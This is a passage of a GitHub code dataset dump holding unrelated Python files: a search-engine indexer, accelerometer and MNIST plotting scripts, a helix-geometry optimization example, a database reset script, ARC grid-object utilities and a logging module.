Current vocab size: \", len(self.termMap))\n self.consolidate_temp()\n self.consolidate = 0\n\n def writeCatalog(self, filename):\n with open(filename, \"w+\") as out:\n for termId, offset in self.catalog.items():\n out.write(str(termId) + \",\" + str(offset) + \"\\n\")\n\n def writeCatalogTemp(self, filename, indexfile):\n with open(filename, \"w+\") as out:\n for termId, offset in self.catalog2[indexfile].items():\n out.write(str(termId) + \",\" + str(offset) + \"\\n\")\n\n def writeTermMap(self, filename):\n with open(filename, \"w+\") as out:\n for term in self.termMap:\n out.write(term + \"\\n\")\n\n def writeDocMap(self, filename):\n with open(filename, \"w+\") as out:\n for doc in self.docMap:\n out.write(doc + \"\\n\")\n\n def readCatalog(self, catalogFile):\n catalog = defaultdict(int)\n # Read from file\n with open(catalogFile, \"r\") as infile:\n for line in infile:\n termId, offset = line.strip().split(\",\")\n catalog[int(termId)] = int(offset)\n self.catalog = catalog\n\n def writeDLen(self, filename):\n with open(filename, \"w+\") as out:\n for termId, dlen in self.dlen.items():\n out.write(str(termId) + \",\" + str(dlen) + \"\\n\")\n\n def writeTTF(self, filename):\n with open(filename, \"w+\") as out:\n for termId, dlen in self.ttf.items():\n out.write(str(termId) + \",\" + str(dlen) + \"\\n\")\n\n def writeDF(self, filename):\n with open(filename, \"w+\") as out:\n for termId, dlen in self.df.items():\n out.write(str(termId) + \",\" + str(dlen) + \"\\n\")\n\n def readDLen(self, dlenFile):\n catalog = defaultdict(int)\n # Read from file\n with open(dlenFile, \"r\") as infile:\n for line in infile:\n termId, dlen = line.strip().split(\",\")\n catalog[int(termId)] = int(dlen)\n self.dlen = catalog\n\n def readTTF(self, dlenFile):\n catalog = defaultdict(int)\n # Read from file\n with open(dlenFile, \"r\") as infile:\n for line in infile:\n termId, dlen = line.strip().split(\",\")\n catalog[int(termId)] = int(dlen)\n self.ttf = catalog\n\n def readDF(self, dlenFile):\n catalog = defaultdict(int)\n # Read from file\n with open(dlenFile, \"r\") as infile:\n for line in infile:\n termId, dlen = line.strip().split(\",\")\n catalog[int(termId)] = int(dlen)\n self.df = catalog\n\n def reindex(self, outfile= output_folder + \"1.index\"):\n \"\"\" Reads from current temp file and catalog and creates a final index and catalog \"\"\"\n new_catalog = defaultdict(int)\n with open(outfile, \"w\") as out:\n for termId, offset in self.catalog.items():\n docs, df, ttf = self.readTermFromFile(self.temp_file, termId)\n new_catalog[termId] = out.tell()\n outStr = str(termId) + \":\" + str(df) + \":\" + str(ttf) + \":\"\n tempStr = []\n\n for docId, values in docs.items():\n tempStr.append(str(docId) + \",\" + str(values['tf']) + \",\" + \"{}\".format(\n \".\".join(map(lambda x: str(x), values['pos']))))\n outStr += \"|\".join(tempStr)\n # print(outStr)\n out.write(outStr + \"\\n\")\n self.catalog = new_catalog\n\n def consolidate_temp(self):\n \"\"\" Reads from current temp file and catalog and creates a final index and catalog \"\"\"\n new_catalog = defaultdict(int)\n temp_index_file_new = self.temp_file+\".new\"\n with open(temp_index_file_new, \"w\") as out:\n for termId, offset in self.catalog.items():\n docs, df, ttf = self.readTermFromFile(self.temp_file, termId)\n new_catalog[termId] = out.tell()\n outStr = str(termId) + \":\" + str(df) + \":\" + str(ttf) + \":\"\n tempStr = []\n\n for docId, values in docs.items():\n tempStr.append(str(docId) + \",\" + str(values['tf']) + \",\" + 
\"{}\".format(\n \".\".join(map(lambda x: str(x), values['pos']))))\n outStr += \"|\".join(tempStr)\n out.write(outStr + \"\\n\")\n os.remove(self.temp_file)\n os.rename(temp_index_file_new, self.temp_file)\n self.catalog = new_catalog\n\n def cleanup(self):\n index_file = index_folder + self.indexname + \".index\"\n catalog_file = misc_folder + self.indexname + \".catalog\"\n term_file = misc_folder + self.indexname + \".termmap\"\n doc_file = misc_folder + self.indexname + \".docmap\"\n dlen_file = misc_folder + self.indexname + \".dlen\"\n ttf_file = misc_folder + self.indexname + \".ttf\"\n df_file = misc_folder + self.indexname + \".df\"\n\n self.reindex(index_file)\n self.writeCatalog(catalog_file)\n self.writeTermMap(term_file)\n self.writeDocMap(doc_file)\n self.writeDLen(dlen_file)\n self.writeTTF(ttf_file)\n self.writeDF(df_file)\n\n # self.clearTempFile()\n\n\n def mergeDocs2(self, termId, filename, nw_docs):\n old_docs, _, _ = self.readTermFromFile2(filename, termId)\n\n join_docs = {}\n join_docs.update(nw_docs)\n join_docs.update(old_docs)\n # TODO: Switch to custom merge sort\n newdocs = OrderedDict(sorted(join_docs.items(), key=lambda x: x[1][\"tf\"], reverse=True))\n return newdocs\n\n def writeTempData2(self, itermCount):\n current_file = self.temp_file + str(self.consolidate)\n with open(current_file, \"w+\") as out:\n for termId, docs in itermCount.items():\n if termId not in self.catalog2.keys():\n self.catalog2[termId] = defaultdict(int)\n offset = out.tell()\n self.catalog2[termId][current_file] = offset\n self.catalog[termId] = offset\n outStr = str(termId) + \":\" + str(self.df[termId]) + \":\" + str(self.ttf[termId]) + \":\"\n tempStr = []\n\n for docId, values in docs.items():\n tempStr.append(str(docId) + \",\" + str(values['tf']) + \",\" + \"{}\".format(\n \".\".join(map(lambda x: str(x), values['pos']))))\n outStr += \"|\".join(tempStr)\n # print(outStr)\n out.write(outStr + \"\\n\")\n self.writeCatalog(self.temp_catalog_file + str(self.consolidate))\n self.catalog = defaultdict(int)\n self.consolidate += 1\n\n def mergeAll(self, outfile= output_folder + \"1.index\"):\n print(\"Writing final file..\")\n new_catalog = defaultdict(int)\n with open(outfile, \"w\") as out:\n for termId, values in self.catalog2.items():\n docs = {}\n for filename, offset in values.items():\n docs = self.mergeDocs2(termId, filename, docs)\n new_catalog[termId] = out.tell()\n outStr = str(termId) + \":\" + str(self.df[termId]) + \":\" + str(self.ttf[termId]) + \":\"\n tempStr = []\n\n for docId, values in docs.items():\n tempStr.append(str(docId) + \",\" + str(values['tf']) + \",\" + \"{}\".format(\n \".\".join(map(lambda x: str(x), values['pos']))))\n outStr += \"|\".join(tempStr)\n # print(outStr)\n out.write(outStr + \"\\n\")\n self.catalog = new_catalog\n\n def cleanup2(self):\n index_file = index_folder + self.indexname + \".index\"\n catalog_file = misc_folder + self.indexname + \".catalog\"\n term_file = misc_folder + self.indexname + \".termmap\"\n doc_file = misc_folder + self.indexname + \".docmap\"\n dlen_file = misc_folder + self.indexname + \".dlen\"\n ttf_file = misc_folder + self.indexname + \".ttf\"\n df_file = misc_folder + self.indexname + \".df\"\n\n self.mergeAll(index_file)\n self.writeCatalog(catalog_file)\n self.writeTermMap(term_file)\n self.writeDocMap(doc_file)\n self.writeDLen(dlen_file)\n self.writeTTF(ttf_file)\n self.writeDF(df_file)\n\n # 
self.clearTempFile()","repo_name":"ronnygeo/SearchEngine","sub_path":"src/indexer/Indexer.py","file_name":"Indexer.py","file_ext":"py","file_size_in_byte":14185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"23858260286","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\ndef loadTimeSeriesCSV(tsFile):\n    \"\"\"Load time series csv.gz file and append date/time column to it\n\n    The time associated with each reading can be inferred from the very first\n    row, which describes the sample rate, start and end times of the data.\n\n    For example header\n    \"acceleration (mg) - 2014-05-07 13:29:50 - 2014-05-13 09:50:25 - sampleRate = 5 seconds, imputed\"\n    indicates that the first measurement time is at 2014-05-07 13:29:50, the second\n    at 2014-05-07 13:29:55, the third at 2014-05-07 13:30:00 ... and the last at\n    2014-05-13 09:50:25.\n\n    :param str tsFile: Output filename for .csv.gz file\n\n    :return: Pandas dataframe of epoch data\n    :rtype: pandas.DataFrame\n\n    :Example:\n    >>> import accUtils\n    >>> import pandas as pd\n    >>> df = accUtils.loadTimeSeriesCSV(\"sample-timeSeries.csv.gz\")\n    \n    \"\"\"\n    DAYS = ['mon', 'tue', 'wed', 'thur', 'fri', 'sat', 'sun']\n    TIME_SERIES_COL = 'time'\n    # get header\n    header = pd.read_csv(tsFile, nrows=1, header=0, compression='gzip')\n    headerInfo = header.columns[0]\n    if header.columns[0] == TIME_SERIES_COL:\n        headerInfo = header.columns[1]\n        header.columns = [TIME_SERIES_COL, 'acc'] + header.columns[2:].tolist()\n    else:\n        header.columns = ['acc'] + header.columns[1:].tolist()\n    # read start time, endtime, and sample rate\n    startDate = headerInfo.split(\" - \")[1]\n    endDate = headerInfo.split(\" - \")[2]\n    sampleRate = headerInfo.split(\"sampleRate = \")[1].split(\" \")[0]\n\n    # read data\n    tsData = pd.read_csv(tsFile, skiprows=1, header=None, names=header.columns,\n                         compression='gzip')\n    if header.columns[0] != TIME_SERIES_COL:\n        tsData.index = pd.date_range(start=startDate, end=endDate,\n                                     freq=str(sampleRate) + 's')\n    return tsData\n\ndf = loadTimeSeriesCSV(r'C:\\\\Users\\\\simpl\\\\Documents\\\\VM_Ubuntu\\\\50\\\\45676_50hz_CWA-DATA-timeSeries.csv.gz')\nwalking_interval2 = df[df['walking'] == 1].index  # ._short_repr will be the str\nsleeping_interval2 = df[df['sleep'] == 1].index\nsedentary_interval2 = df[df['sedentary'] == 1].index\nmoderate_interval2 = df[df['moderate'] == 1].index\nimputed_interval2 = df[df['imputed'] == 1].index\n\n# NOTE (editorial fix): the original script used walking_interval, sleeping_interval,\n# etc. below without ever defining them, which raises NameError. They presumably come\n# from the matching 100 Hz export; the path below is an assumption mirroring the 50 Hz one.\ndf100 = loadTimeSeriesCSV(r'C:\\\\Users\\\\simpl\\\\Documents\\\\VM_Ubuntu\\\\100\\\\45676_100hz_CWA-DATA-timeSeries.csv.gz')\nwalking_interval = df100[df100['walking'] == 1].index\nsleeping_interval = df100[df100['sleep'] == 1].index\nsedentary_interval = df100[df100['sedentary'] == 1].index\nmoderate_interval = df100[df100['moderate'] == 1].index\nimputed_interval = df100[df100['imputed'] == 1].index\n\nplt.figure()\nbarWidth = 0.375\nnames = ['walking', 'sleeping', 'sedentary', 'moderate', 'imputed']\n\nr1 = range(5)\nr2 = [x + 0.5 * barWidth for x in r1]  # lists rather than lazy map objects, so plt.bar can consume them\nr1 = [x - 0.5 * barWidth for x in r1]\n\n# Create red Bars walking\nplt.bar(r1, [len(walking_interval), len(sleeping_interval), len(sedentary_interval), len(moderate_interval), len(imputed_interval)], color='#CD6155', edgecolor='white', width=barWidth,\n        label=\"100Hz\")\n# Create yellow Bars moderate\nplt.bar(r2, [len(walking_interval2), len(sleeping_interval2), len(sedentary_interval2), len(moderate_interval2), len(imputed_interval2)], color='#F5B041', edgecolor='white', width=barWidth, label=\"50Hz\")\n# Custom axis\nplt.xticks(range(5), names)\nplt.xlabel(\"Activities\")\nplt.ylabel(\"Epochs\")\nplt.legend(loc=\"upper right\", fontsize=20)  # \"NorthOutside\" is MATLAB syntax, not a valid matplotlib loc\n# Show 
graphic\nplt.show()\n\n","repo_name":"Tim-Yu/BrainWear_gait_analysis","sub_path":"archived/100_50.py","file_name":"100_50.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73358894632","text":"import math\ndef power(model):\n l = len(model)\n count = 0\n g = 0\n d= {}\n for i in model:\n if i not in d:\n d[i] = 1\n else:\n d[i] += 1\n ceiling = int(math.ceil(l/2))\n ds = sorted(d.items(), key=lambda x: x[1], reverse =True)\n for i in ds:\n if i[1]< ceiling and count < ceiling:\n count += i[1]\n g += 1\n else:\n break\n return g\n\nprint(power([3,4,6,11,9,9,9,9,8,8,8,8,8,8]))\n\n\n","repo_name":"Ashi-s/coding_problems","sub_path":"FT_Coding/Akuna/akuna power.py","file_name":"akuna power.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31279397139","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import Counter\n\n# Load MNIST dataset\nmnist = tf.keras.datasets.mnist\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# Get 9 random indices\nrandom_indices = np.random.choice(len(x_test), 9, replace=False)\n\n# Plot 3x3 grid\nfig, axes = plt.subplots(3, 3, figsize=(6, 6))\n\nfor i, ax in enumerate(axes.flat):\n idx = random_indices[i]\n image = x_test[idx]\n label = y_test[idx]\n \n ax.imshow(image, cmap='gray')\n ax.set_title(f\"Amostra: {label}\")\n ax.axis('off')\n\nplt.tight_layout()\n#plt.show()\nplt.savefig ('mnist_samples.pdf')\n\n\nclass_counts = Counter(y_train)\nfor label, count in class_counts.items():\n print(f\"(Training set) Class {label}: {count} samples\")\n\nclass_counts = Counter(y_test)\nfor label, count in class_counts.items():\n print(f\"(Test set) Class {label}: {count} samples\")\n","repo_name":"kaylani2/mestrado","sub_path":"src/plot_mnist_samples.py","file_name":"plot_mnist_samples.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8825682085","text":"import os\r\nimport numpy as np\r\nfrom cg_openmm.utilities.helix_optimize_geometry import *\r\n\r\n# Optimize radius, pitch, and positions of equally spaced particles along a helix,\r\n# with constraints on bb-bb and bb-sc bond lengths.\r\n\r\n# Particle LJ 12-6 parameters:\r\nsigma_bb = 1.0 * unit.angstrom\r\nsigma_sc = 1.0 * unit.angstrom\r\n\r\nepsilon_bb = 1.0 * unit.kilojoule_per_mole\r\nepsilon_sc = 1.0 * unit.kilojoule_per_mole\r\n\r\n# Number of backbone particles:\r\nn_particle_bb = 24\r\n\r\n# Bond constraints (equilibrium values)\r\nbond_dist_bb = 1.08 * unit.angstrom\r\nbond_dist_sc = 1.08 * unit.angstrom\r\n\r\nopt_solution, geometry = optimize_helix_openmm_energy(\r\n n_particle_bb, sigma_bb, sigma_sc, epsilon_bb, epsilon_sc,\r\n bond_dist_bb=bond_dist_bb, bond_dist_sc=bond_dist_sc,\r\n pdbfile='LJ_helix_openmm_energy_constrained.pdb',\r\n plotfile='LJ_helix_openmm_energy_constrained.pdf',\r\n DE_popsize=50)\r\n\r\nprint(opt_solution)\r\nprint(geometry)","repo_name":"shirtsgroup/cg_openmm","sub_path":"examples/helix_modeling/optimize_helix_parameters/optimize_helices_openmm_energy_constrained.py","file_name":"optimize_helices_openmm_energy_constrained.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"11777064011","text":"from 
bson.objectid import ObjectId\nfrom netuse.database.execution import Execution\nfrom netuse.database.results import HTTPTrace\n\ndef reset_execution(execution_id): \n for req in HTTPTrace.objects(execution=execution_id):\n req.delete()\n \n ex = Execution.objects(id=execution_id).first()\n ex.execution_date = None\n ex.save()\n\n\ndef main():\n import argparse\n \n parser = argparse.ArgumentParser(description='Manage data.')\n parser.add_argument('-o','--oid', default=None, dest='oid',\n help='Specify the object id of the execution set to be destroyed.')\n \n args = parser.parse_args()\n objID = args.oid\n \n if objID==None:\n raise Exception(\"A oid should be provided.\")\n else:\n reset_execution(ObjectId(objID))\n\n\nif __name__ == '__main__':\n main()","repo_name":"gomezgoiri/Semantic-WoT-Environment-Simulation","sub_path":"src/netuse/database/management/delete_execution.py","file_name":"delete_execution.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23910037407","text":"import torch\nimport matplotlib.pylab as plt\nimport scipy as sp\nfrom torch.autograd import Variable\nfrom numbers import Number\nimport scipy.ndimage\nimport numpy as np\n\n# Baby-ARC related imports\n\ndef to_np_array(*arrays, **kwargs):\n array_list = []\n for array in arrays:\n if isinstance(array, Variable):\n if array.is_cuda:\n array = array.cpu()\n array = array.data\n if isinstance(array, torch.Tensor) or isinstance(array, torch.FloatTensor) or isinstance(array, torch.LongTensor) or isinstance(array, torch.ByteTensor) or \\\n isinstance(array, torch.cuda.FloatTensor) or isinstance(array, torch.cuda.LongTensor) or isinstance(array, torch.cuda.ByteTensor):\n if array.is_cuda:\n array = array.cpu()\n array = array.numpy()\n if isinstance(array, Number):\n pass\n elif isinstance(array, list) or isinstance(array, tuple):\n array = np.array(array)\n elif array.shape == (1,):\n if \"full_reduce\" in kwargs and kwargs[\"full_reduce\"] is False:\n pass\n else:\n array = array[0]\n elif array.shape == ():\n array = array.tolist()\n array_list.append(array)\n if len(array_list) == 1:\n array_list = array_list[0]\n return array_list\n \ndef get_obj_from_mask(input, obj_mask=None):\n \"\"\"Get the object from the mask.\"\"\"\n if obj_mask is None:\n return input\n assert input.shape[-2:] == obj_mask.shape\n if isinstance(input, np.ndarray):\n input = torch.FloatTensor(input)\n if isinstance(obj_mask, np.ndarray):\n obj_mask = torch.BoolTensor(obj_mask.astype(bool))\n shape = input.shape\n if len(shape) == 3:\n output = torch.zeros_like(input).reshape(input.shape[0], -1)\n idx = obj_mask.flatten().bool()\n output[:, idx] = input.reshape(input.shape[0], -1)[:, idx]\n else:\n output = torch.zeros_like(input).flatten()\n idx = obj_mask.flatten().bool()\n output[idx] = input.flatten()[idx]\n return output.reshape(shape)\n\ndef shrink(input):\n \"\"\" Find the smallest region of your matrix that contains all the nonzero elements \"\"\"\n if not isinstance(input, torch.Tensor):\n input = torch.FloatTensor(input)\n is_numpy = True\n else:\n is_numpy = False\n if input.abs().sum() == 0:\n return input, (0, 0, input.shape[-2], input.shape[-1])\n if len(input.shape) == 3:\n input_core = input.mean(0)\n else:\n input_core = input\n rows = torch.any(input_core.bool(), axis=-1)\n cols = torch.any(input_core.bool(), axis=-2)\n ymin, ymax = torch.where(rows)[0][[0, -1]]\n xmin, xmax = torch.where(cols)[0][[0, -1]]\n shrinked = 
input[..., ymin:ymax+1, xmin:xmax+1]\n pos = (ymin.item(), xmin.item(), shrinked.shape[-2], shrinked.shape[-1])\n if is_numpy:\n shrinked = to_np_array(shrinked)\n return shrinked, pos\n\ndef find_connected_components(input, is_diag=True, is_mask=False):\n \"\"\"Find all the connected components, regardless of color.\"\"\"\n input = to_np_array(input)\n shape = input.shape\n if is_diag:\n structure = [[1,1,1], [1,1,1], [1,1,1]]\n else:\n structure = [[0,1,0], [1,1,1], [0,1,0]]\n if len(shape) == 3:\n input_core = input.mean(0)\n else:\n input_core = input\n labeled, ncomponents = sp.ndimage.measurements.label(input_core, structure)\n\n objects = []\n for i in range(1, ncomponents + 1):\n obj_mask = (labeled == i).astype(int)\n obj = shrink(get_obj_from_mask(input, obj_mask))\n if is_mask:\n objects.append(obj + (obj_mask,))\n else:\n objects.append(obj)\n return objects\n\ndef find_connected_components_colordiff(input, is_diag=True, color=True):\n \"\"\"Find all the connected components, considering color.\"\"\"\n input = to_np_array(input)\n shape = input.shape\n\n if len(shape) == 3:\n assert shape[0] == 3\n color_list = np.unique(input.reshape(shape[0], -1), axis=-1).T\n bg_color = np.zeros(shape[0])\n else:\n input_core = input\n color_list = np.unique(input)\n bg_color = 0\n\n objects = []\n for c in color_list:\n if not (c == bg_color).all():\n if len(shape) == 3:\n mask = np.array(input!=c[:,None,None]).any(0, keepdims=True).repeat(shape[0], axis=0)\n else:\n mask = np.array(input!=c, dtype=int)\n color_mask = np.ma.masked_array(input, mask)\n color_mask = color_mask.filled(fill_value=0)\n objs = find_connected_components(color_mask, is_diag=is_diag)\n objects += objs\n return objects\n\n \n# general util functions like plots, helpers to manipulate matrics\ndef remove_duplicates(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\ndef get_indices(tensor, pos=None, includes_neighbor=False, includes_self=True):\n \"\"\"Get the indices of nonzero elements of an image.\n\n Args:\n tensor: 2D or 3D tensor. If 3D, it must have the shape of [C, H, W] where C is the number of channels.\n pos: position of the upper-left corner pixel of the tensor in the larger image. 
If None, will default as (0, 0).\n includes_neighbor: whether to include indices of neighbors (up, down, left, right).\n includes_self: if includes_neighbor is True, whether to include its own indices.\n\n Returns:\n indices: a list of indices satisfying the specification.\n \"\"\"\n mask = tensor > 0\n if len(mask.shape) == 3:\n mask = mask.any(0)\n pos_add = (int(pos[0]), int(pos[1])) if pos is not None else (0, 0)\n indices = []\n self_indices = []\n for i, j in torch.stack(torch.where(mask)).T:\n i, j = int(i) + pos_add[0], int(j) + pos_add[1]\n self_indices.append((i, j))\n if includes_neighbor:\n indices.append((i + 1, j))\n indices.append((i - 1, j))\n indices.append((i, j + 1))\n indices.append((i, j - 1))\n if includes_neighbor:\n if not includes_self:\n indices = list(set(indices).difference(set(self_indices)))\n else:\n indices = remove_duplicates(indices)\n else:\n indices = self_indices\n return indices\n\ndef plot_with_boundary(image, plt):\n im = plt.imshow(image, interpolation='none', vmin=0, vmax=1, aspect='equal');\n height, width = np.array(image).shape[:2]\n ax = plt.gca();\n\n # Major ticks\n ax.set_xticks(np.arange(0, width, 1));\n ax.set_yticks(np.arange(0, height, 1));\n\n # Labels for major ticks\n ax.set_xticklabels(np.arange(1, width + 1, 1));\n ax.set_yticklabels(np.arange(1, height + 1, 1));\n\n # Minor ticks\n ax.set_xticks(np.arange(-.5, width, 1), minor=True);\n ax.set_yticks(np.arange(-.5, height, 1), minor=True);\n\n # Gridlines based on minor ticks\n ax.grid(which='minor', color='w', linestyle='-', linewidth=1)\n \n plt.xticks([])\n plt.yticks([])\n\ndef get_object_position_tags(obj_pos_t, root_shape_t):\n position_tags = []\n # using the first two bit of determine whether attach to left or up\n if obj_pos_t[0] == 0:\n position_tags.append(\"upper\")\n if obj_pos_t[1] == 0:\n position_tags.append(\"left\")\n if (obj_pos_t[0]+obj_pos_t[2]) == root_shape_t[0]:\n position_tags.append(\"lower\")\n if (obj_pos_t[1]+obj_pos_t[3]) == root_shape_t[1]:\n position_tags.append(\"right\")\n return position_tags\n\ndef randint_exclude(l, u, e):\n r = e[0]\n while r in e:\n r = random.randint(l, u)\n return r\n\ndef single_task_obj_parser(task_id):\n \"\"\"\n return a list of objects contained in this task.\n \"\"\"\n task_objs = []\n task_id += \".json\"\n (inputs, _), (_, _) = load_task(task_id, isplot=False)\n # parse objects in 3 ways\n inputs_graph = parse_obj(inputs)\n for i in range(len(inputs_graph[0])):\n root_shape_t = inputs_graph[0][i].get_node_value(\"Image\").shape\n for obj_n in inputs_graph[0][i].objs:\n obj_img_t = inputs_graph[0][i].get_node_value(obj_n)\n obj_pos_t = inputs_graph[0][i].get_node_value(obj_n.split(\":\")[0]+\"^pos:Pos\")\n obj_position_tags = get_object_position_tags(obj_pos_t, root_shape_t)\n obj_fmt = Object(obj_img_t, obj_position_tags)\n task_objs.append(obj_fmt)\n \n inputs_graph = parse_obj(inputs, is_colordiff=False)\n for i in range(len(inputs_graph[0])):\n root_shape_t = inputs_graph[0][i].get_node_value(\"Image\").shape\n for obj_n in inputs_graph[0][i].objs:\n obj_img_t = inputs_graph[0][i].get_node_value(obj_n)\n obj_pos_t = inputs_graph[0][i].get_node_value(obj_n.split(\":\")[0]+\"^pos:Pos\")\n obj_position_tags = get_object_position_tags(obj_pos_t, root_shape_t)\n obj_fmt = Object(obj_img_t, obj_position_tags)\n task_objs.append(obj_fmt)\n \n inputs_graph = parse_obj(inputs, is_diag=False)\n for i in range(len(inputs_graph[0])):\n root_shape_t = inputs_graph[0][i].get_node_value(\"Image\").shape\n for obj_n in 
inputs_graph[0][i].objs:\n obj_img_t = inputs_graph[0][i].get_node_value(obj_n)\n obj_pos_t = inputs_graph[0][i].get_node_value(obj_n.split(\":\")[0]+\"^pos:Pos\")\n obj_position_tags = get_object_position_tags(obj_pos_t, root_shape_t)\n obj_fmt = Object(obj_img_t, obj_position_tags)\n task_objs.append(obj_fmt)\n return task_objs\n\n# relation parser as we need for multihop reasonings\ndef SameShape(image1, pos1, image2, pos2):\n if np.prod(image1.shape) == 0:\n return False\n if np.prod(image2.shape) == 0:\n return False\n if image1.shape != image2.shape:\n return False\n else:\n return (image1.bool() == image2.bool()).all()\n\ndef SameColor(image1, pos1, image2, pos2):\n color1 = -1 if len(image1.unique()) > 2 else image1.unique()[0]\n color2 = -1 if len(image2.unique()) > 2 else image2.unique()[0]\n if image1.unique()[0] == 0:\n color1 = image1.unique()[1]\n if image2.unique()[0] == 0:\n color2 = image2.unique()[1]\n \n if color1 == -1 or color2 == -1:\n return False\n else:\n return color1 == color2\n\ndef SameAll(image1, pos1, image2, pos2):\n if np.prod(image1.shape) == 0:\n return False\n if np.prod(image2.shape) == 0:\n return False\n if image1.shape != image2.shape:\n return False\n else:\n return (image1 == image2).all()\n\ndef SameRow(image1, pos1, image2, pos2):\n pos1 = (pos1[0], pos1[1], image1.shape[0], image1.shape[1])\n pos2 = (pos2[0], pos2[1], image2.shape[0], image2.shape[1])\n if pos1[0] == pos2[0] and pos1[2] == pos2[2]:\n return True\n else:\n return False\n\ndef SameCol(image1, pos1, image2, pos2):\n pos1 = (pos1[0], pos1[1], image1.shape[0], image1.shape[1])\n pos2 = (pos2[0], pos2[1], image2.shape[0], image2.shape[1])\n if pos1[1] == pos2[1] and pos1[3] == pos2[3]:\n return True\n else:\n return False\n\ndef IsInside(image1, pos1, image2, pos2):\n \"\"\"Whether obj1 is inside obj2.\"\"\"\n pos1 = (pos1[0], pos1[1], image1.shape[0], image1.shape[1])\n pos2 = (pos2[0], pos2[1], image2.shape[0], image2.shape[1])\n if pos1[0] > pos2[0] and pos1[1] > pos2[1] and pos1[0] + pos1[2] < pos2[0] + pos2[2] and pos1[1] + pos1[3] < pos2[1] + pos2[3]:\n image2_patch = image2[int(pos1[0] - pos2[0]): int(pos1[0] + pos1[2] - pos2[0]), \n int(pos1[1] - pos2[1]): int(pos1[1] + pos1[3] - pos2[1])]\n overlap = (image1 != 0) & (image2_patch != 0)\n if overlap.any():\n return False\n else:\n return True\n else:\n return False\n \ndef IsNonOverlapXY(image1, pos1, image2, pos2):\n \"\"\"Whether obj1 is inside obj2.\"\"\"\n rec1 = (pos1[0], pos1[1], pos1[0]+image1.shape[0], pos1[1]+image1.shape[1])\n rec2 = (pos2[0], pos2[1], pos2[0]+image2.shape[0], pos2[1]+image2.shape[1])\n def intersect(p_left, p_right, q_left, q_right):\n return min(p_right, q_right) > max(p_left, q_left)\n if (intersect(rec1[0], rec1[2], rec2[0], rec2[2]) & \\\n intersect(rec1[1], rec1[3], rec2[1], rec2[3])):\n return False\n return True\n\ndef IsTouch(image1, pos1, image2, pos2):\n \"\"\"Whether the \"obj\"'s leftmost/rightmost/upmost/downmost part touches any other pixels (up, down, left, right) or boundary in the \"image\".\"\"\"\n pos1 = (pos1[0], pos1[1], image1.shape[0], image1.shape[1])\n pos2 = (pos2[0], pos2[1], image2.shape[0], image2.shape[1])\n obj_indices = get_indices(\n image1,\n pos1,\n includes_self=False,\n includes_neighbor=True,\n )\n obj2_indices = get_indices(image2, pos2)\n is_torch = len(set(obj_indices).intersection(set(obj2_indices))) > 0\n return 
is_torch","repo_name":"frankaging/BabyARC","sub_path":"code/dataset/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12902,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"14690503478","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : EXP\n# @Time : 2020/4/26 13:14\n# @File : log.py\n# -----------------------------------------------\n# Logging\n# -----------------------------------------------\n\nimport traceback\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\nfrom src.cfg.env import PRJ_DIR\n\nRUN_LOG = '%s/log/run.log' % PRJ_DIR\nERR_LOG = '%s/log/err.log' % PRJ_DIR\n\n\ndef init(runlog = RUN_LOG, errlog = ERR_LOG):\n    \"\"\"\n    Initialize the logging configuration (only needs to be called once, at the program entry point)\n    :return: None\n    \"\"\"\n\n    # global configuration\n    logger = logging.getLogger()\n    logger.setLevel(\"DEBUG\")\n    BASIC_FORMAT = \"%(asctime)s [%(levelname)s] : %(message)s\"\n    DATE_FORMAT = \"%Y-%m-%d %H:%M:%S\"\n    formatter = logging.Formatter(BASIC_FORMAT, DATE_FORMAT)\n\n    # handler that writes to the console\n    ch = logging.StreamHandler()\n    ch.setFormatter(formatter)\n    ch.setLevel(\"DEBUG\")\n    logger.addHandler(ch)\n\n    # handler that writes to the run log file\n    fh = TimedRotatingFileHandler(filename=runlog, when=\"MIDNIGHT\", interval=1, backupCount=7)\n    fh.setFormatter(formatter)\n    fh.setLevel(\"INFO\")\n    logger.addHandler(fh)\n\n    # handler that writes to the error log file\n    exfh = TimedRotatingFileHandler(filename=errlog, when=\"MIDNIGHT\", interval=1, backupCount=7)\n    exfh.setLevel(\"ERROR\")\n    exfh.setFormatter(formatter)\n    logger.addHandler(exfh)\n\n    # disable third-party logging\n    # logging.getLogger(\"requests\").setLevel(logging.FATAL)\n\n\n\ndef debug(msg):\n    \"\"\"\n    Print a debug message\n    :param msg: log message\n    :return: None\n    \"\"\"\n    logging.debug(msg)\n\n\ndef info(msg):\n    \"\"\"\n    Print an info message\n    :param msg: log message\n    :return: None\n    \"\"\"\n    logging.info(msg)\n\n\ndef warn(msg):\n    \"\"\"\n    Print a warning message\n    :param msg: log message\n    :return: None\n    \"\"\"\n    logging.warning(msg)\n\n\ndef error(msg):\n    \"\"\"\n    Print an error message together with the exception stack trace\n    :param msg: log message\n    :return: None\n    \"\"\"\n    logging.exception(msg)\n    logging.exception(traceback.format_exc())\n","repo_name":"Mr-xn/threat-broadcast","sub_path":"src/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"72"} +{"seq_id":"6568376663","text":"SCREEN_HEIGHT = 10 * 16\nSCREEN_WIDTH = 10 * 16\n\nKIND_POSTION = (0, 0, \"Potion\", 5, 10)\nKIND_BOMB = (16, 0, \"Bomb\", 